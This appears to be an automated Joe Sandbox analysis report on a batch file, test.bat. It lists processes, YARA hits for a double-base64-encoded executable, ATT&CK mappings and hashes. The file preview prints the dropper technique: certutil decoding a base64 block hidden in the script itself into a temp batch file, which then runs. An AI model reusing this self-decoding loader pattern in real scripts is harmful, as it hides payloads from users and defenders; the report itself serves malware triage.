Windows
Analysis Report
test.bat
Overview
General Information
Detection
Score: | 1 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- cmd.exe (PID: 7248 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\test. bat" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 7256 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - mode.com (PID: 7308 cmdline:
Mode 60,3 MD5: 1A3D2D975EB4A5AF22768F1E23C9A83C) - certutil.exe (PID: 7328 cmdline:
CERTUTIL - f -decode "C:\Users\ user\Deskt op\test.ba t" "C:\Use rs\user\Ap pData\Loca l\Temp\1.b at" MD5: EB199893441CED4BBBCB547FE411CF2D)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_Double_Base64_Encoded_Executable | Detects an executable that has been encoded with base64 twice | Florian Roth (Nextron Systems) |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_Double_Base64_Encoded_Executable | Detects an executable that has been encoded with base64 twice | Florian Roth (Nextron Systems) |
| |
SUSP_Double_Base64_Encoded_Executable | Detects an executable that has been encoded with base64 twice | Florian Roth (Nextron Systems) |
|
Click to jump to signature section
There are no malicious signatures, click here to show all signatures.
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | File created: | Jump to behavior |
Source: | Process created: |
Source: | Mutant created: |
Source: | Key opened: | Jump to behavior |
Source: | Classification label: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Static file information: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Last function: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 1 Scripting | Path Interception | 11 Process Injection | 11 Process Injection | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Data Obfuscation | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Scripting | LSASS Memory | 1 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
3% | ReversingLabs | Win32.Trojan.Generic | ||
7% | Virustotal | Browse |
Joe Sandbox Version: | 37.1.0 Beryl |
Analysis ID: | 876994 |
Start date and time: | 2023-05-28 09:32:19 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 3m 50s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 4 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample file name: | test.bat |
Detection: | CLEAN |
Classification: | clean1.winBAT@6/2@0/0 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Not all processes where analyzed, report is missing behavior information
Process: | C:\Windows\System32\certutil.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4490960 |
Entropy (8bit): | 5.084469480252474 |
Encrypted: | false |
SSDEEP: | 24576:gUMlU9gRTCyXsYpmM5uXnR4r5ZVeeSZNpE8ybnuSjPJeMMKz1OiPYQ8huXwN9JKG:JKcu6ep4PHAL4jVYC2/ig+ |
MD5: | 25978F2599F1B076B115175A8F557392 |
SHA1: | 3441D1B82C073217A76826C79A75C85355EECE29 |
SHA-256: | 54B229E2CA59E0421FF71D5DF7F344D567A3B77D8472B8F690DDAB0A3839A955 |
SHA-512: | 66B4DE8F20456C43244058AAE45FDB9DE9E80F21C450EE233D5F4F149C9EC8AD8F6BEFE870F12829A936EA80A6660D600BDEA87483DA203E4EB3619DC936075B |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\certutil.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 100 |
Entropy (8bit): | 4.894177320667445 |
Encrypted: | false |
SSDEEP: | 3:qOYFTUxovF6M+YFRRcTwqRF8jxd1ELzdUA2AGN8cv:q3eWnFcCxILxUANGN8e |
MD5: | 9C411874FFF521EF1CEBAA7F35890C52 |
SHA1: | CB963C0D48F92C6C5D601F68D7D56ECC19411239 |
SHA-256: | FF1208CD7D8DC8A23757389FA46955CDA31B024EF5180D4A5EC854BF319DFBEC |
SHA-512: | 4D7727CE7C0F5383F06F96FFD115EA9AF22A53B14B7C6C6FAC448B18DCF12F915A8C99BAC29580B853A97B0A5DDBA767FB3556453EA290715CF0E3E6B2D5F307 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 5.20450028605933 |
TrID: |
|
File name: | test.bat |
File size: | 6175325 |
MD5: | 7e1348c4cc1ddab3b771afb1dd4c9cc2 |
SHA1: | b395aa85edf28a8852ede1d2a59e964584a4fc7f |
SHA256: | 6f308d6ea87ba7a786e0868014d018a928b4cabc4d354d67e8e1d7f3e7eb9cc7 |
SHA512: | 8cd7db51c75e37a3191141632485922d20eecefb16d94aa8629aad3b1951b18e09baa599b5b0c99137262ef34a1fb3414137fcc5ccc5f21e9cf3fa9654a6aa6c |
SSDEEP: | 49152:G4duV2eLoRzGGqGLDw3jF/8ahdU79QVCp4:+ |
TLSH: | DE563C60AF88654DB2881D8BF02E695AB5F32B86C9B3B2CCE343780FB95FD1D3515845 |
File Content Preview: | ..&cls..@echo off ..Title %~n0..Mode 60,3 ..color 0B..echo(..echo Please wait... a while Loading data ......CERTUTIL -f -decode "%~f0" "%Temp%\1.bat" >nul 2>&1 ..cls.."%Temp%\1.bat"..Exit..-----BEGIN CERTIFICATE-----..QGVjaG8gb2ZmDQpTdGFydCAiQ2xpZ |
Icon Hash: | 9686878b929a9886 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 09:33:20 |
Start date: | 28/05/2023 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff632260000 |
File size: | 273920 bytes |
MD5 hash: | 4E2ACF4F8A396486AB4268C94A6A245F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 1 |
Start time: | 09:33:20 |
Start date: | 28/05/2023 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7c72c0000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 2 |
Start time: | 09:33:21 |
Start date: | 28/05/2023 |
Path: | C:\Windows\System32\mode.com |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7ae380000 |
File size: | 31232 bytes |
MD5 hash: | 1A3D2D975EB4A5AF22768F1E23C9A83C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 3 |
Start time: | 09:33:21 |
Start date: | 28/05/2023 |
Path: | C:\Windows\System32\certutil.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6f6a00000 |
File size: | 1557504 bytes |
MD5 hash: | EB199893441CED4BBBCB547FE411CF2D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | moderate |